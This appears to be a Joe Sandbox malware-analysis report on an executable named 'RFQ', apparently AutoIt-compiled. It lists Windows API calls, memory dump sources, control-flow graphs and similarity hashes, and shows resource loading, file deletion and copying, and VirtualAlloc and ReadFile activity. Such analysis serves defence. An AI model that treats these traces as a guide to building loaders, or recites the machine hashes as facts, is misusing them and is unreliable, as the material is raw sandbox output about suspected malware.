                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3851250370-0
                                                                                                                                                    • Opcode ID: d47fbb2a07d4057d89cc8d1086a80a232cacecfdc4b25fe6b1bfcfd7d7c40e44
                                                                                                                                                    • Instruction ID: 356c89ff7dbc9c4809f47019fb970d6cc6326c9b31b60dac6ab397c5360e61e5
                                                                                                                                                    • Opcode Fuzzy Hash: d47fbb2a07d4057d89cc8d1086a80a232cacecfdc4b25fe6b1bfcfd7d7c40e44
                                                                                                                                                    • Instruction Fuzzy Hash: 7E61AFB180A2D4DBCF25CF6898C45E97FB46F6A300B1989D9D8859F207D728CD09CB66

Control-flow Graph

[Control-flow graph rendered as an image; legend: Executed / Not Executed. Basic blocks 73406b-7340a6 and 7a4f16-7a4f6e; the graph shows calls to CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource.]
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0073449E,?,?,00000000,00000001), ref: 0073407B
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0073449E,?,?,00000000,00000001), ref: 00734092
• LoadResource.KERNEL32(?,00000000,?,?,0073449E,?,?,00000000,00000001,?,?,?,?,?,?,007341FB), ref: 007A4F1A
• SizeofResource.KERNEL32(?,00000000,?,?,0073449E,?,?,00000000,00000001,?,?,?,?,?,?,007341FB), ref: 007A4F2F
• LockResource.KERNEL32(0073449E,?,?,0073449E,?,?,00000000,00000001,?,?,?,?,?,?,007341FB,00000000), ref: 007A4F42
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: a718abe34639e11a5773f565f5df25267ed81f0f8ffb426c25293e421c2bc89c
• Instruction ID: a2e542edd064faa413b4c586eeb3af2157bd7fa16206279f44088f4d921f19d4
• Opcode Fuzzy Hash: a718abe34639e11a5773f565f5df25267ed81f0f8ffb426c25293e421c2bc89c
• Instruction Fuzzy Hash: DB113C71200701BFE7399B65EC48F677BB9EBC5B51F14826CF602962A0EB75EC009A30
APIs
• GetFileAttributesW.KERNELBASE(?,007A2F49), ref: 00776CB9
• FindFirstFileW.KERNELBASE(?,?), ref: 00776CCA
• FindClose.KERNEL32(00000000), ref: 00776CDA
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: aeded13f2567d1987a0a9e807090568d1372a3ad27400e52bf48112b70959362
• Instruction ID: 074ac3ac44504c402aaf596f3891018d59e76c0ac515ed5e44331254e5ebbee0
• Opcode Fuzzy Hash: aeded13f2567d1987a0a9e807090568d1372a3ad27400e52bf48112b70959362
• Instruction Fuzzy Hash: 50E0D835810819578620673CEC0D8E9376CDA05379F108715F575C11D0F778ED0455E9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID: @
• API String ID: 3728558374-2766056989
• Opcode ID: 796dfc07fc158879b17ec340b54cf605b3e5a0d584c77524b47f38574deb3a84
• Instruction ID: 318b0283284ed154deb1a8f45c987971226576975660abf98d847052766632de
• Opcode Fuzzy Hash: 796dfc07fc158879b17ec340b54cf605b3e5a0d584c77524b47f38574deb3a84
• Instruction Fuzzy Hash: 5572B171E04108DFCF24DF94C885ABEB7B5FF49300F14805AE919AB291D779AE45CBA1
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: BuffCharUpper
• String ID:
• API String ID: 3964851224-0
• Opcode ID: d21effc4756596b7f463b8402ff27c46800a96e0191d9dfabbc49d21def537b6
• Instruction ID: 646d31a55f036a298168c9cbf4f67cbdedb03971e3c0ff0388a9e016dc29c000
• Opcode Fuzzy Hash: d21effc4756596b7f463b8402ff27c46800a96e0191d9dfabbc49d21def537b6
• Instruction Fuzzy Hash: D1927670608241CFD724DF18C484B6ABBE1BF89304F14895DF98A8B2A2D779ED45CB92
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0073E959
• timeGetTime.WINMM ref: 0073EBFA
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0073ED2E
• TranslateMessage.USER32(?), ref: 0073ED3F
• DispatchMessageW.USER32(?), ref: 0073ED4A
• LockWindowUpdate.USER32(00000000), ref: 0073ED79
• DestroyWindow.USER32 ref: 0073ED85
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073ED9F
• Sleep.KERNEL32(0000000A), ref: 007A5270
• TranslateMessage.USER32(?), ref: 007A59F7
• DispatchMessageW.USER32(?), ref: 007A5A05
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007A5A19
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 2641332412-570651680
• Opcode ID: f3277084205f4716305f6c3fe8b6f8162c17713adcd3bd53076a1bdae0b45051
• Instruction ID: 4b805e85b435d6f118c910a0db1e98b4e4e6216195ecc4c72913d7677f332d64
• Opcode Fuzzy Hash: f3277084205f4716305f6c3fe8b6f8162c17713adcd3bd53076a1bdae0b45051
• Instruction Fuzzy Hash: AF628F70504340DBEB25DF24C889BAA77E4BF85304F144A6DF9869B2D2DB7DA844CB62
APIs
• ___createFile.LIBCMT ref: 00765EC3
• ___createFile.LIBCMT ref: 00765F04
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00765F2D
• __dosmaperr.LIBCMT ref: 00765F34
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00765F47
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00765F6A
• __dosmaperr.LIBCMT ref: 00765F73
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00765F7C
• __set_osfhnd.LIBCMT ref: 00765FAC
• __lseeki64_nolock.LIBCMT ref: 00766016
• __close_nolock.LIBCMT ref: 0076603C
• __chsize_nolock.LIBCMT ref: 0076606C
• __lseeki64_nolock.LIBCMT ref: 0076607E
• __lseeki64_nolock.LIBCMT ref: 00766176
• __lseeki64_nolock.LIBCMT ref: 0076618B
• __close_nolock.LIBCMT ref: 007661EB
  • Part of subcall function 0075EA9C: CloseHandle.KERNELBASE(00000000,007DEEF4,00000000,?,00766041,007DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0075EAEC
  • Part of subcall function 0075EA9C: GetLastError.KERNEL32(?,00766041,007DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0075EAF6
                                                                                                                                                      • Part of subcall function 0075EA9C: __free_osfhnd.LIBCMT ref: 0075EB03
                                                                                                                                                      • Part of subcall function 0075EA9C: __dosmaperr.LIBCMT ref: 0075EB25
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    • __lseeki64_nolock.LIBCMT ref: 0076620D
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00766342
                                                                                                                                                    • ___createFile.LIBCMT ref: 00766361
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0076636E
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00766375
                                                                                                                                                    • __free_osfhnd.LIBCMT ref: 00766395
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 007663C3
                                                                                                                                                    • __wsopen_helper.LIBCMT ref: 007663DD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 3896587723-2766056989
                                                                                                                                                    • Opcode ID: f6517a589bc2a5cb98749f65dda0b03e71a61d063e288adf83bc875da7dec98f
                                                                                                                                                    • Instruction ID: 611c70529905b5d3ed7f8c2011d3b8bb516a466dd1476c9a9d0f79a22fb82ec4
                                                                                                                                                    • Opcode Fuzzy Hash: f6517a589bc2a5cb98749f65dda0b03e71a61d063e288adf83bc875da7dec98f
                                                                                                                                                    • Instruction Fuzzy Hash: 86222471A0060A9FEF299F68DC95BFD7B61EB05314F684228EC229B2D2C77D8D40D791

Control-flow Graph

APIs
• _wcscpy.LIBCMT ref: 0077FA96
• _wcschr.LIBCMT ref: 0077FAA4
• _wcscpy.LIBCMT ref: 0077FABB
• _wcscat.LIBCMT ref: 0077FACA
• _wcscat.LIBCMT ref: 0077FAE8
• _wcscpy.LIBCMT ref: 0077FB09
• __wsplitpath.LIBCMT ref: 0077FBE6
• _wcscpy.LIBCMT ref: 0077FC0B
• _wcscpy.LIBCMT ref: 0077FC1D
• _wcscpy.LIBCMT ref: 0077FC32
• _wcscat.LIBCMT ref: 0077FC47
• _wcscat.LIBCMT ref: 0077FC59
• _wcscat.LIBCMT ref: 0077FC6E
  • Part of subcall function 0077BFA4: _wcscmp.LIBCMT ref: 0077C03E
  • Part of subcall function 0077BFA4: __wsplitpath.LIBCMT ref: 0077C083
  • Part of subcall function 0077BFA4: _wcscpy.LIBCMT ref: 0077C096
  • Part of subcall function 0077BFA4: _wcscat.LIBCMT ref: 0077C0A9
  • Part of subcall function 0077BFA4: __wsplitpath.LIBCMT ref: 0077C0CE
  • Part of subcall function 0077BFA4: _wcscat.LIBCMT ref: 0077C0E4
  • Part of subcall function 0077BFA4: _wcscat.LIBCMT ref: 0077C0F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
• String ID: >>>AUTOIT SCRIPT<<<$t2~
• API String ID: 2955681530-1003817682
• Opcode ID: 9a980b9fd4fcd630ec849374e098846fa22b75ebbcec0f888da7012d4f6bc984
• Instruction ID: 8388e37923995e3b1e10da1745b67e0219d910f5cdb552a5357f9ac529a8f164
• Opcode Fuzzy Hash: 9a980b9fd4fcd630ec849374e098846fa22b75ebbcec0f888da7012d4f6bc984
• Instruction Fuzzy Hash: 8591C472504705DFDF20EB64C995F9AB3E8BF84310F008869F94997292DB79FA48CB91

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00733F86
• RegisterClassExW.USER32(00000030), ref: 00733FB0
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00733FC1
• InitCommonControlsEx.COMCTL32(?), ref: 00733FDE
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00733FEE
• LoadIconW.USER32(000000A9), ref: 00734004
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00734013
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: e557714a13c2cbc203033d7967774e035ebb10cbef0208bd3f1c1cf86f888e1e
• Instruction ID: 0bea655df1d60e61011f44ab1e5c7f1aadf946ef70308610bf293729258e0f7a
• Opcode Fuzzy Hash: e557714a13c2cbc203033d7967774e035ebb10cbef0208bd3f1c1cf86f888e1e
• Instruction Fuzzy Hash: 5221CAB5900218EFDB10DF95E889BDD7BB4FB08700F40821AF511E62A0DBB94944CF99

Control-flow Graph

APIs
  • Part of subcall function 0077BDB4: __time64.LIBCMT ref: 0077BDBE
  • Part of subcall function 00734517: _fseek.LIBCMT ref: 0073452F
• __wsplitpath.LIBCMT ref: 0077C083
  • Part of subcall function 00751DFC: __wsplitpath_helper.LIBCMT ref: 00751E3C
• _wcscpy.LIBCMT ref: 0077C096
• _wcscat.LIBCMT ref: 0077C0A9
• __wsplitpath.LIBCMT ref: 0077C0CE
• _wcscat.LIBCMT ref: 0077C0E4
• _wcscat.LIBCMT ref: 0077C0F7
• _wcscmp.LIBCMT ref: 0077C03E
  • Part of subcall function 0077C56D: _wcscmp.LIBCMT ref: 0077C65D
  • Part of subcall function 0077C56D: _wcscmp.LIBCMT ref: 0077C670
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0077C2A1
• DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0077C338
• CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0077C34E
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0077C35F
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0077C371
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
• String ID:
• API String ID: 2378138488-0
• Opcode ID: ccc2938d3fe0202649fa022d6bbf1a86ba11dea779e419d8d7cf4bb1ceaba725
• Instruction ID: ce5670d59cc0cf7ba5a796b3a31c8edbe0037d238bf43c0043286da1a8622a59
• Opcode Fuzzy Hash: ccc2938d3fe0202649fa022d6bbf1a86ba11dea779e419d8d7cf4bb1ceaba725
• Instruction Fuzzy Hash: 09C13DB1900219EFDF25DF94CC85EDEB7BCAF49340F0080AAF609E6152DB749A848F65

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 957 733742-733762 959 7337c2-7337c4 957->959 960 733764-733767 957->960 959->960 961 7337c6 959->961 962 733769-733770 960->962 963 7337c8 960->963 964 7337ab-7337b3 DefWindowProcW 961->964 967 733776-73377b 962->967 968 73382c-733834 PostQuitMessage 962->968 965 7a1e00-7a1e2e call 732ff6 call 74e312 963->965 966 7337ce-7337d1 963->966 970 7337b9-7337bf 964->970 1000 7a1e33-7a1e3a 965->1000 971 7337d3-7337d4 966->971 972 7337f6-73381d SetTimer RegisterWindowMessageW 966->972 974 7a1e88-7a1e9c call 774ddd 967->974 975 733781-733783 967->975 969 7337f2-7337f4 968->969 969->970 976 7a1da3-7a1da6 971->976 977 7337da-7337ed KillTimer call 733847 call 73390f 971->977 972->969 979 73381f-73382a CreatePopupMenu 972->979 974->969 993 7a1ea2 974->993 980 733836-733845 call 74eb83 975->980 981 733789-73378e 975->981 985 7a1da8-7a1daa 976->985 986 7a1ddc-7a1dfb MoveWindow 976->986 977->969 979->969 980->969 989 7a1e6d-7a1e74 981->989 990 733794-733799 981->990 995 7a1dcb-7a1dd7 SetFocus 985->995 996 7a1dac-7a1daf 985->996 986->969 989->964 998 7a1e7a-7a1e83 call 76a5f3 989->998 991 7a1e58-7a1e68 call 7755bd 990->991 992 73379f-7337a5 990->992 991->969 992->964 992->1000 993->964 995->969 996->992 1001 7a1db5-7a1dc6 call 732ff6 996->1001 998->964 1000->964 1005 7a1e40-7a1e53 call 733847 call 734ffc 1000->1005 1001->969 1005->964
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 007337B3
                                                                                                                                                    • KillTimer.USER32(?,00000001), ref: 007337DD
                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00733800
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0073380B
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 0073381F
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0073382E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                    • Opcode ID: fea5331b5aeb5644edbb5189b81d04e75090c3797b8d3da5cddff90a0f6c9213
                                                                                                                                                    • Instruction ID: 15696d246e95f7fce89152abf11c4d5189e7ae4154d17b7056830aeb68bc82c9
                                                                                                                                                    • Opcode Fuzzy Hash: fea5331b5aeb5644edbb5189b81d04e75090c3797b8d3da5cddff90a0f6c9213
                                                                                                                                                    • Instruction Fuzzy Hash: B84127F520414AEBFB346B289C8EFB93755F740341F848225F60692293DB6D9D50C766

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00733E79
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00733E88
                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00733E9E
                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00733EB0
                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00733EC2
                                                                                                                                                      • Part of subcall function 00734024: LoadImageW.USER32(00730000,00000063,00000001,00000010,00000010,00000000), ref: 00734048
                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00733F30
                                                                                                                                                      • Part of subcall function 00733F53: GetSysColorBrush.USER32(0000000F), ref: 00733F86
                                                                                                                                                      • Part of subcall function 00733F53: RegisterClassExW.USER32(00000030), ref: 00733FB0
                                                                                                                                                      • Part of subcall function 00733F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00733FC1
                                                                                                                                                      • Part of subcall function 00733F53: InitCommonControlsEx.COMCTL32(?), ref: 00733FDE
                                                                                                                                                      • Part of subcall function 00733F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00733FEE
                                                                                                                                                      • Part of subcall function 00733F53: LoadIconW.USER32(000000A9), ref: 00734004
                                                                                                                                                      • Part of subcall function 00733F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00734013
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                    • Opcode ID: 5840ea9c758f3240ac3e9b3ca0a12ad53c0bcc19d9e9de7800dcd829e4a3f95b
                                                                                                                                                    • Instruction ID: 9912a234f310f2a1f42f06acb6a6c7be4b7b9f14c7eb4f045120883dcce35245
                                                                                                                                                    • Opcode Fuzzy Hash: 5840ea9c758f3240ac3e9b3ca0a12ad53c0bcc19d9e9de7800dcd829e4a3f95b
                                                                                                                                                    • Instruction Fuzzy Hash: EB2133B0D00308EBDB14DFA9EC45BA9BBF5FB48310F50822AE614A22A1D7794640CF99

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 1021 10662a0-106634e call 1063c80 1024 1066355-106637b call 10671b0 CreateFileW 1021->1024 1027 1066382-1066392 1024->1027 1028 106637d 1024->1028 1033 1066394 1027->1033 1034 1066399-10663b3 VirtualAlloc 1027->1034 1029 10664cd-10664d1 1028->1029 1030 1066513-1066516 1029->1030 1031 10664d3-10664d7 1029->1031 1035 1066519-1066520 1030->1035 1036 10664e3-10664e7 1031->1036 1037 10664d9-10664dc 1031->1037 1033->1029 1038 10663b5 1034->1038 1039 10663ba-10663d1 ReadFile 1034->1039 1040 1066575-106658a 1035->1040 1041 1066522-106652d 1035->1041 1042 10664f7-10664fb 1036->1042 1043 10664e9-10664f3 1036->1043 1037->1036 1038->1029 1046 10663d3 1039->1046 1047 10663d8-1066418 VirtualAlloc 1039->1047 1050 106658c-1066597 VirtualFree 1040->1050 1051 106659a-10665a2 1040->1051 1048 1066531-106653d 1041->1048 1049 106652f 1041->1049 1044 10664fd-1066507 1042->1044 1045 106650b 1042->1045 1043->1042 1044->1045 1045->1030 1046->1029 1052 106641f-106643a call 1067400 1047->1052 1053 106641a 1047->1053 1054 1066551-106655d 1048->1054 1055 106653f-106654f 1048->1055 1049->1040 1050->1051 1061 1066445-106644f 1052->1061 1053->1029 1058 106655f-1066568 1054->1058 1059 106656a-1066570 1054->1059 1057 1066573 1055->1057 1057->1035 1058->1057 1059->1057 1062 1066482-1066496 call 1067210 1061->1062 1063 1066451-1066480 call 1067400 1061->1063 1068 106649a-106649e 1062->1068 1069 1066498 1062->1069 1063->1061 1071 10664a0-10664a4 CloseHandle 1068->1071 1072 10664aa-10664ae 1068->1072 1069->1029 1071->1072 1073 10664b0-10664bb VirtualFree 1072->1073 1074 10664be-10664c7 1072->1074 1073->1074 1074->1024 1074->1029
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01066371
